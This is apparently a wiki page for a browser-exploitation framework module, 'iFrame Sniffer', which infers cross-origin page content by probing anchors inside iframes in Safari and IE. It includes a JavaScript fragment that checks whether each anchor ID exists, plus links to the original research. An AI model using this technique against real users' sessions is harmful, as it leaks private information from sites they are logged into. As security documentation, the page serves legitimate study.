-
Notifications
You must be signed in to change notification settings - Fork 2.3k
Module: iFrame Sniffer
Haoxi Tan edited this page Jan 9, 2020
·
3 revisions
-
Objective: Sniff data from other origins via iframes
-
Authors: Bart Leppens
-
Browsers: Safari, IE
By using anchors (#) to request cross origin resources in an iframe, it can leak information based on the presence and absense of elements.
Content can't be directly read with this technique, but data can be inferred from web applications.
if (typeof LeakyFrame === 'function') {
new LeakyFrame(inputURL,
function(frame){
//check each anchor
for (var anchor = 0; anchor < arrayOfAnchorsToCheck.length; anchor++){
if (frame.checkID(arrayOfAnchorsToCheck[anchor])){
resultList.push('Exists');
}
else{
resultList.push('Does not exist');
}
}
frame.remove();https://www.contextis.com/en/blog/framesniffing-against-sharepoint-and-linkedin
(old link, maybe check it on archive.org): http://www.contextis.co.uk/research/blog/framesniffing/
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK